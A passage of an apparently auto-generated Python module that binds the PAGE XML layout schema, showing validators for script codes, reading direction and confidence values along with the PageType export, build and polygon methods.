'Hung - Old Hungarian (Hungarian Runic)', 'Inds - Indus (Harappan)', 'Ital - Old Italic (Etruscan, Oscan etc.)', 'Jamo - Jamo', 'Java - Javanese', 'Jpan - Japanese', 'Jurc - Jurchen', 'Kali - Kayah Li', 'Kana - Katakana', 'Khar - Kharoshthi', 'Khmr - Khmer', 'Khoj - Khojki', 'Kitl - Khitan large script', 'Kits - Khitan small script', 'Knda - Kannada', 'Kore - Korean (alias for Hangul + Han)', 'Kpel - Kpelle', 'Kthi - Kaithi', 'Lana - Tai Tham (Lanna)', 'Laoo - Lao', 'Latf - Latin (Fraktur variant)', 'Latg - Latin (Gaelic variant)', 'Latn - Latin', 'Leke - Leke', 'Lepc - Lepcha (Róng)', 'Limb - Limbu', 'Lina - Linear A', 'Linb - Linear B', 'Lisu - Lisu (Fraser)', 'Loma - Loma', 'Lyci - Lycian', 'Lydi - Lydian', 'Mahj - Mahajani', 'Mand - Mandaic, Mandaean', 'Mani - Manichaean', 'Marc - Marchen', 'Maya - Mayan hieroglyphs', 'Mend - Mende Kikakui', 'Merc - Meroitic Cursive', 'Mero - Meroitic Hieroglyphs', 'Mlym - Malayalam', 'Modi - Modi, Moḍī', 'Mong - Mongolian', 'Moon - Moon (Moon code, Moon script, Moon type)', 'Mroo - Mro, Mru', 'Mtei - Meitei Mayek (Meithei, Meetei)', 'Mult - Multani', 'Mymr - Myanmar (Burmese)', 'Narb - Old North Arabian (Ancient North Arabian)', 'Nbat - Nabataean', 'Newa - Newa, Newar, Newari', 'Nkgb - Nakhi Geba', 'Nkoo - N’Ko', 'Nshu - Nüshu', 'Ogam - Ogham', 'Olck - Ol Chiki (Ol Cemet’, Ol, Santali)', 'Orkh - Old Turkic, Orkhon Runic', 'Orya - Oriya', 'Osge - Osage', 'Osma - Osmanya', 'Palm - Palmyrene', 'Pauc - Pau Cin Hau', 'Perm - Old Permic', 'Phag - Phags-pa', 'Phli - Inscriptional Pahlavi', 'Phlp - Psalter Pahlavi', 'Phlv - Book Pahlavi', 'Phnx - Phoenician', 'Piqd - Klingon (KLI pIqaD)', 'Plrd - Miao (Pollard)', 'Prti - Inscriptional Parthian', 'Rjng - Rejang (Redjang, Kaganga)', 'Roro - Rongorongo', 'Runr - Runic', 'Samr - Samaritan', 'Sara - Sarati', 'Sarb - Old South Arabian', 'Saur - Saurashtra', 'Sgnw - SignWriting', 'Shaw - Shavian (Shaw)', 'Shrd - Sharada, Śāradā', 'Sidd - Siddham', 'Sind - Khudawadi, Sindhi', 'Sinh - Sinhala', 'Sora - Sora Sompeng', 'Sund - Sundanese', 'Sylo - Syloti Nagri', 'Syrc - Syriac', 'Syre - Syriac (Estrangelo variant)', 'Syrj - Syriac (Western variant)', 'Syrn - Syriac (Eastern variant)', 'Tagb - Tagbanwa', 'Takr - Takri', 'Tale - Tai Le', 'Talu - New Tai Lue', 'Taml - Tamil', 'Tang - Tangut', 'Tavt - Tai Viet', 'Telu - Telugu', 'Teng - Tengwar', 'Tfng - Tifinagh (Berber)', 'Tglg - Tagalog (Baybayin, Alibata)', 'Thaa - Thaana', 'Thai - Thai', 'Tibt - Tibetan', 'Tirh - Tirhuta', 'Ugar - Ugaritic', 'Vaii - Vai', 'Visp - Visible Speech', 'Wara - Warang Citi (Varang Kshiti)', 'Wole - Woleai', 'Xpeo - Old Persian', 'Xsux - Cuneiform, Sumero-Akkadian', 'Yiii - Yi', 'Zinh - Code for inherited script', 'Zmth - Mathematical notation', 'Zsye - Symbols (Emoji variant)', 'Zsym - Symbols', 'Zxxx - Code for unwritten documents', 'Zyyy - Code for undetermined script', 'Zzzz - Code for uncoded script', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ScriptSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                # NOTE(review): `result` is a dead local kept from the
                # generator; the collector message above is the real outcome.
                result = False
def validate_ReadingDirectionSimpleType(self, value):
# Validate type pc:ReadingDirectionSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['left-to-right', 'right-to-left', 'top-to-bottom', 'bottom-to-top']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ReadingDirectionSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_TextLineOrderSimpleType(self, value):
# Validate type pc:TextLineOrderSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['top-to-bottom', 'bottom-to-top', 'left-to-right', 'right-to-left']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on TextLineOrderSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def validate_ConfSimpleType(self, value):
# Validate type pc:ConfSimpleType, a restriction on float.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, float):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (float)' % {"value": value, "lineno": lineno, })
return False
if value < 0:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
if value > 1:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd maxInclusive restriction on ConfSimpleType' % {"value": value, "lineno": lineno} )
result = False
def hasContent_(self):
if (
self.AlternativeImage or
self.Border is not None or
self.PrintSpace is not None or
self.ReadingOrder is not None or
self.Layers is not None or
self.Relations is not None or
self.TextStyle is not None or
self.UserDefined is not None or
self.Labels or
self.TextRegion or
self.ImageRegion or
self.LineDrawingRegion or
self.GraphicRegion or
self.TableRegion or
self.ChartRegion or
self.MapRegion or
self.SeparatorRegion or
self.MathsRegion or
self.ChemRegion or
self.MusicRegion or
self.AdvertRegion or
self.NoiseRegion or
self.UnknownRegion or
self.CustomRegion
):
return True
else:
return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='PageType', pretty_print=True):
        """Serialize this Page element to *outfile* as XML, indented to *level*.

        Writes the opening tag with all set attributes, then — only when
        hasContent_() reports children — the child elements via exportChildren
        and a closing tag; otherwise a self-closing tag.  When the instance was
        parsed from XML, the original tag name (original_tagname_) overrides
        the default 'PageType' so round-tripping preserves the element name.
        """
        # Allow an externally registered namespace definition to override the default.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('PageType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'PageType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='PageType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='PageType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='PageType'):
        """Write every set (non-None) XML attribute of this Page to *outfile*.

        *already_processed* guards against emitting an attribute twice when
        subclasses chain their exportAttributes implementations.  String-typed
        attributes are quoted and XML-escaped via quote_attrib/gds_encode;
        numeric attributes go through the gds_format_* helpers.
        """
        if self.imageFilename is not None and 'imageFilename' not in already_processed:
            already_processed.add('imageFilename')
            outfile.write(' imageFilename=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.imageFilename), input_name='imageFilename')), ))
        if self.imageWidth is not None and 'imageWidth' not in already_processed:
            already_processed.add('imageWidth')
            outfile.write(' imageWidth="%s"' % self.gds_format_integer(self.imageWidth, input_name='imageWidth'))
        if self.imageHeight is not None and 'imageHeight' not in already_processed:
            already_processed.add('imageHeight')
            outfile.write(' imageHeight="%s"' % self.gds_format_integer(self.imageHeight, input_name='imageHeight'))
        if self.imageXResolution is not None and 'imageXResolution' not in already_processed:
            already_processed.add('imageXResolution')
            outfile.write(' imageXResolution="%s"' % self.gds_format_float(self.imageXResolution, input_name='imageXResolution'))
        if self.imageYResolution is not None and 'imageYResolution' not in already_processed:
            already_processed.add('imageYResolution')
            outfile.write(' imageYResolution="%s"' % self.gds_format_float(self.imageYResolution, input_name='imageYResolution'))
        if self.imageResolutionUnit is not None and 'imageResolutionUnit' not in already_processed:
            already_processed.add('imageResolutionUnit')
            outfile.write(' imageResolutionUnit=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.imageResolutionUnit), input_name='imageResolutionUnit')), ))
        if self.custom is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
        # Note: the attribute is stored as self.type_ (trailing underscore avoids
        # shadowing the builtin) but is serialized under its schema name 'type'.
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
        if self.primaryLanguage is not None and 'primaryLanguage' not in already_processed:
            already_processed.add('primaryLanguage')
            outfile.write(' primaryLanguage=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryLanguage), input_name='primaryLanguage')), ))
        if self.secondaryLanguage is not None and 'secondaryLanguage' not in already_processed:
            already_processed.add('secondaryLanguage')
            outfile.write(' secondaryLanguage=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.secondaryLanguage), input_name='secondaryLanguage')), ))
        if self.primaryScript is not None and 'primaryScript' not in already_processed:
            already_processed.add('primaryScript')
            outfile.write(' primaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.primaryScript), input_name='primaryScript')), ))
        if self.secondaryScript is not None and 'secondaryScript' not in already_processed:
            already_processed.add('secondaryScript')
            outfile.write(' secondaryScript=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.secondaryScript), input_name='secondaryScript')), ))
        if self.readingDirection is not None and 'readingDirection' not in already_processed:
            already_processed.add('readingDirection')
            outfile.write(' readingDirection=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.readingDirection), input_name='readingDirection')), ))
        if self.textLineOrder is not None and 'textLineOrder' not in already_processed:
            already_processed.add('textLineOrder')
            outfile.write(' textLineOrder=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.textLineOrder), input_name='textLineOrder')), ))
        if self.conf is not None and 'conf' not in already_processed:
            already_processed.add('conf')
            outfile.write(' conf="%s"' % self.gds_format_float(self.conf, input_name='conf'))
def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='PageType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for AlternativeImage_ in self.AlternativeImage:
namespaceprefix_ = self.AlternativeImage_nsprefix_ + ':' if (UseCapturedNS_ and self.AlternativeImage_nsprefix_) else ''
AlternativeImage_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AlternativeImage', pretty_print=pretty_print)
if self.Border is not None:
namespaceprefix_ = self.Border_nsprefix_ + ':' if (UseCapturedNS_ and self.Border_nsprefix_) else ''
self.Border.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Border', pretty_print=pretty_print)
if self.PrintSpace is not None:
namespaceprefix_ = self.PrintSpace_nsprefix_ + ':' if (UseCapturedNS_ and self.PrintSpace_nsprefix_) else ''
self.PrintSpace.export(outfile, level, namespaceprefix_, namespacedef_='', name_='PrintSpace', pretty_print=pretty_print)
if self.ReadingOrder is not None:
namespaceprefix_ = self.ReadingOrder_nsprefix_ + ':' if (UseCapturedNS_ and self.ReadingOrder_nsprefix_) else ''
self.ReadingOrder.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ReadingOrder', pretty_print=pretty_print)
if self.Layers is not None:
namespaceprefix_ = self.Layers_nsprefix_ + ':' if (UseCapturedNS_ and self.Layers_nsprefix_) else ''
self.Layers.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Layers', pretty_print=pretty_print)
if self.Relations is not None:
namespaceprefix_ = self.Relations_nsprefix_ + ':' if (UseCapturedNS_ and self.Relations_nsprefix_) else ''
self.Relations.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Relations', pretty_print=pretty_print)
if self.TextStyle is not None:
namespaceprefix_ = self.TextStyle_nsprefix_ + ':' if (UseCapturedNS_ and self.TextStyle_nsprefix_) else ''
self.TextStyle.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextStyle', pretty_print=pretty_print)
if self.UserDefined is not None:
namespaceprefix_ = self.UserDefined_nsprefix_ + ':' if (UseCapturedNS_ and self.UserDefined_nsprefix_) else ''
self.UserDefined.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UserDefined', pretty_print=pretty_print)
for Labels_ in self.Labels:
namespaceprefix_ = self.Labels_nsprefix_ + ':' if (UseCapturedNS_ and self.Labels_nsprefix_) else ''
Labels_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Labels', pretty_print=pretty_print)
for TextRegion_ in self.TextRegion:
namespaceprefix_ = self.TextRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.TextRegion_nsprefix_) else ''
TextRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextRegion', pretty_print=pretty_print)
for ImageRegion_ in self.ImageRegion:
namespaceprefix_ = self.ImageRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.ImageRegion_nsprefix_) else ''
ImageRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ImageRegion', pretty_print=pretty_print)
for LineDrawingRegion_ in self.LineDrawingRegion:
namespaceprefix_ = self.LineDrawingRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.LineDrawingRegion_nsprefix_) else ''
LineDrawingRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='LineDrawingRegion', pretty_print=pretty_print)
for GraphicRegion_ in self.GraphicRegion:
namespaceprefix_ = self.GraphicRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.GraphicRegion_nsprefix_) else ''
GraphicRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='GraphicRegion', pretty_print=pretty_print)
for TableRegion_ in self.TableRegion:
namespaceprefix_ = self.TableRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.TableRegion_nsprefix_) else ''
TableRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TableRegion', pretty_print=pretty_print)
for ChartRegion_ in self.ChartRegion:
namespaceprefix_ = self.ChartRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.ChartRegion_nsprefix_) else ''
ChartRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ChartRegion', pretty_print=pretty_print)
for MapRegion_ in self.MapRegion:
namespaceprefix_ = self.MapRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.MapRegion_nsprefix_) else ''
MapRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='MapRegion', pretty_print=pretty_print)
for SeparatorRegion_ in self.SeparatorRegion:
namespaceprefix_ = self.SeparatorRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.SeparatorRegion_nsprefix_) else ''
SeparatorRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='SeparatorRegion', pretty_print=pretty_print)
for MathsRegion_ in self.MathsRegion:
namespaceprefix_ = self.MathsRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.MathsRegion_nsprefix_) else ''
MathsRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='MathsRegion', pretty_print=pretty_print)
for ChemRegion_ in self.ChemRegion:
namespaceprefix_ = self.ChemRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.ChemRegion_nsprefix_) else ''
ChemRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='ChemRegion', pretty_print=pretty_print)
for MusicRegion_ in self.MusicRegion:
namespaceprefix_ = self.MusicRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.MusicRegion_nsprefix_) else ''
MusicRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='MusicRegion', pretty_print=pretty_print)
for AdvertRegion_ in self.AdvertRegion:
namespaceprefix_ = self.AdvertRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.AdvertRegion_nsprefix_) else ''
AdvertRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='AdvertRegion', pretty_print=pretty_print)
for NoiseRegion_ in self.NoiseRegion:
namespaceprefix_ = self.NoiseRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.NoiseRegion_nsprefix_) else ''
NoiseRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='NoiseRegion', pretty_print=pretty_print)
for UnknownRegion_ in self.UnknownRegion:
namespaceprefix_ = self.UnknownRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.UnknownRegion_nsprefix_) else ''
UnknownRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='UnknownRegion', pretty_print=pretty_print)
for CustomRegion_ in self.CustomRegion:
namespaceprefix_ = self.CustomRegion_nsprefix_ + ':' if (UseCapturedNS_ and self.CustomRegion_nsprefix_) else ''
CustomRegion_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='CustomRegion', pretty_print=pretty_print)
def build(self, node, gds_collector_=None):
self.gds_collector_ = gds_collector_
if SaveElementTreeNode:
self.gds_elementtree_node_ = node
already_processed = set()
self.ns_prefix_ = node.prefix
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read all <Page> XML attributes from *node* into this instance.

        Integer/float attributes are parsed with the gds_parse_* helpers;
        typed attributes are passed through their simple-type validators,
        which record any violation on the collector rather than raising.
        *already_processed* prevents double handling when subclasses chain
        their buildAttributes implementations.
        """
        value = find_attr_value_('imageFilename', node)
        if value is not None and 'imageFilename' not in already_processed:
            already_processed.add('imageFilename')
            self.imageFilename = value
        value = find_attr_value_('imageWidth', node)
        if value is not None and 'imageWidth' not in already_processed:
            already_processed.add('imageWidth')
            self.imageWidth = self.gds_parse_integer(value, node, 'imageWidth')
        value = find_attr_value_('imageHeight', node)
        if value is not None and 'imageHeight' not in already_processed:
            already_processed.add('imageHeight')
            self.imageHeight = self.gds_parse_integer(value, node, 'imageHeight')
        value = find_attr_value_('imageXResolution', node)
        if value is not None and 'imageXResolution' not in already_processed:
            already_processed.add('imageXResolution')
            value = self.gds_parse_float(value, node, 'imageXResolution')
            self.imageXResolution = value
        value = find_attr_value_('imageYResolution', node)
        if value is not None and 'imageYResolution' not in already_processed:
            already_processed.add('imageYResolution')
            value = self.gds_parse_float(value, node, 'imageYResolution')
            self.imageYResolution = value
        value = find_attr_value_('imageResolutionUnit', node)
        if value is not None and 'imageResolutionUnit' not in already_processed:
            already_processed.add('imageResolutionUnit')
            self.imageResolutionUnit = value
            self.validate_imageResolutionUnitType(self.imageResolutionUnit)    # validate type imageResolutionUnitType
        value = find_attr_value_('custom', node)
        if value is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            self.custom = value
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        # Schema attribute 'type' is stored as self.type_ to avoid shadowing
        # the builtin name.
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
            self.validate_PageTypeSimpleType(self.type_)    # validate type PageTypeSimpleType
        value = find_attr_value_('primaryLanguage', node)
        if value is not None and 'primaryLanguage' not in already_processed:
            already_processed.add('primaryLanguage')
            self.primaryLanguage = value
            self.validate_LanguageSimpleType(self.primaryLanguage)    # validate type LanguageSimpleType
        value = find_attr_value_('secondaryLanguage', node)
        if value is not None and 'secondaryLanguage' not in already_processed:
            already_processed.add('secondaryLanguage')
            self.secondaryLanguage = value
            self.validate_LanguageSimpleType(self.secondaryLanguage)    # validate type LanguageSimpleType
        value = find_attr_value_('primaryScript', node)
        if value is not None and 'primaryScript' not in already_processed:
            already_processed.add('primaryScript')
            self.primaryScript = value
            self.validate_ScriptSimpleType(self.primaryScript)    # validate type ScriptSimpleType
        value = find_attr_value_('secondaryScript', node)
        if value is not None and 'secondaryScript' not in already_processed:
            already_processed.add('secondaryScript')
            self.secondaryScript = value
            self.validate_ScriptSimpleType(self.secondaryScript)    # validate type ScriptSimpleType
        value = find_attr_value_('readingDirection', node)
        if value is not None and 'readingDirection' not in already_processed:
            already_processed.add('readingDirection')
            self.readingDirection = value
            self.validate_ReadingDirectionSimpleType(self.readingDirection)    # validate type ReadingDirectionSimpleType
        value = find_attr_value_('textLineOrder', node)
        if value is not None and 'textLineOrder' not in already_processed:
            already_processed.add('textLineOrder')
            self.textLineOrder = value
            self.validate_TextLineOrderSimpleType(self.textLineOrder)    # validate type TextLineOrderSimpleType
        value = find_attr_value_('conf', node)
        if value is not None and 'conf' not in already_processed:
            already_processed.add('conf')
            value = self.gds_parse_float(value, node, 'conf')
            self.conf = value
            self.validate_ConfSimpleType(self.conf)    # validate type ConfSimpleType
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
if nodeName_ == 'AlternativeImage':
obj_ = AlternativeImageType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.AlternativeImage.append(obj_)
obj_.original_tagname_ = 'AlternativeImage'
elif nodeName_ == 'Border':
obj_ = BorderType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Border = obj_
obj_.original_tagname_ = 'Border'
elif nodeName_ == 'PrintSpace':
obj_ = PrintSpaceType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.PrintSpace = obj_
obj_.original_tagname_ = 'PrintSpace'
elif nodeName_ == 'ReadingOrder':
obj_ = ReadingOrderType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ReadingOrder = obj_
obj_.original_tagname_ = 'ReadingOrder'
elif nodeName_ == 'Layers':
obj_ = LayersType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Layers = obj_
obj_.original_tagname_ = 'Layers'
elif nodeName_ == 'Relations':
obj_ = RelationsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Relations = obj_
obj_.original_tagname_ = 'Relations'
elif nodeName_ == 'TextStyle':
obj_ = TextStyleType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextStyle = obj_
obj_.original_tagname_ = 'TextStyle'
elif nodeName_ == 'UserDefined':
obj_ = UserDefinedType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UserDefined = obj_
obj_.original_tagname_ = 'UserDefined'
elif nodeName_ == 'Labels':
obj_ = LabelsType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.Labels.append(obj_)
obj_.original_tagname_ = 'Labels'
elif nodeName_ == 'TextRegion':
obj_ = TextRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TextRegion.append(obj_)
obj_.original_tagname_ = 'TextRegion'
elif nodeName_ == 'ImageRegion':
obj_ = ImageRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ImageRegion.append(obj_)
obj_.original_tagname_ = 'ImageRegion'
elif nodeName_ == 'LineDrawingRegion':
obj_ = LineDrawingRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.LineDrawingRegion.append(obj_)
obj_.original_tagname_ = 'LineDrawingRegion'
elif nodeName_ == 'GraphicRegion':
obj_ = GraphicRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.GraphicRegion.append(obj_)
obj_.original_tagname_ = 'GraphicRegion'
elif nodeName_ == 'TableRegion':
obj_ = TableRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.TableRegion.append(obj_)
obj_.original_tagname_ = 'TableRegion'
elif nodeName_ == 'ChartRegion':
obj_ = ChartRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ChartRegion.append(obj_)
obj_.original_tagname_ = 'ChartRegion'
elif nodeName_ == 'MapRegion':
obj_ = MapRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.MapRegion.append(obj_)
obj_.original_tagname_ = 'MapRegion'
elif nodeName_ == 'SeparatorRegion':
obj_ = SeparatorRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.SeparatorRegion.append(obj_)
obj_.original_tagname_ = 'SeparatorRegion'
elif nodeName_ == 'MathsRegion':
obj_ = MathsRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.MathsRegion.append(obj_)
obj_.original_tagname_ = 'MathsRegion'
elif nodeName_ == 'ChemRegion':
obj_ = ChemRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.ChemRegion.append(obj_)
obj_.original_tagname_ = 'ChemRegion'
elif nodeName_ == 'MusicRegion':
obj_ = MusicRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.MusicRegion.append(obj_)
obj_.original_tagname_ = 'MusicRegion'
elif nodeName_ == 'AdvertRegion':
obj_ = AdvertRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.AdvertRegion.append(obj_)
obj_.original_tagname_ = 'AdvertRegion'
elif nodeName_ == 'NoiseRegion':
obj_ = NoiseRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.NoiseRegion.append(obj_)
obj_.original_tagname_ = 'NoiseRegion'
elif nodeName_ == 'UnknownRegion':
obj_ = UnknownRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.UnknownRegion.append(obj_)
obj_.original_tagname_ = 'UnknownRegion'
elif nodeName_ == 'CustomRegion':
obj_ = CustomRegionType.factory(parent_object_=self)
obj_.build(child_, gds_collector_=gds_collector_)
self.CustomRegion.append(obj_)
obj_.original_tagname_ = 'CustomRegion'
def get_polygon(self):
'''
Get polygon from Page element (whole image)
'''
x0y0 = [0, 0]
x1y0 = [self.imageWidth - 1, 0]
x1y1 = [self.imageWidth - 1, self.imageHeight - 1]
x0y1 = [0, self.imageHeight - 1]
return [x0y0, x1y0, x1y1, x0y1, x0y0]
def get_polygon_string(self):
'''
Get polygon string from Page element (whole image)
'''
x0y0 = '0,0'
x1y0 = str(self.imageWidth - 1) + ',0'
x1y1 = str(self.imageWidth - 1) + ',' + str(self.imageHeight - 1)
x0y1 = '0,' + str(self.imageHeight - 1)
return ','.join([x0y0, x1y0, x1y1, x0y1, x0y0])
# end class PageType
class CoordsType(GeneratedsSuper):
    """Polygon outline of an element as a closed path of points.

    No point may lie outside the outline of the parent element, which in the
    case of Border is the bounding rectangle of the root image.  Paths are
    closed by convention, i.e. the last point logically connects with the
    first, and at least 3 points are required to span an area.  Paths must be
    planar (must not self-intersect).

    XML attributes:
        points -- required coordinate string 'x1,y1 x2,y2 ...' (pc:PointsType)
        conf   -- optional confidence value between 0 and 1 (pc:ConfSimpleType)

    Fixes over the generated original: dead ``result = False`` stores in
    validate_ConfSimpleType removed (``result`` was never initialized or
    returned), and hasContent_'s always-falsy empty-tuple test replaced by an
    explicit ``return False``.
    """
    __hash__ = GeneratedsSuper.__hash__
    member_data_items_ = [
        MemberSpec_('points', 'pc:PointsType', 0, 0, {'use': 'required'}),
        MemberSpec_('conf', 'pc:ConfSimpleType', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = None
    def __init__(self, points=None, conf=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.points = _cast(None, points)
        self.points_nsprefix_ = None
        self.conf = _cast(float, conf)
        self.conf_nsprefix_ = None
    def factory(*args_, **kwargs_):
        # Prefer an externally registered subclass module, then the classic
        # generateDS `subclass` hook, before defaulting to CoordsType itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, CoordsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if CoordsType.subclass:
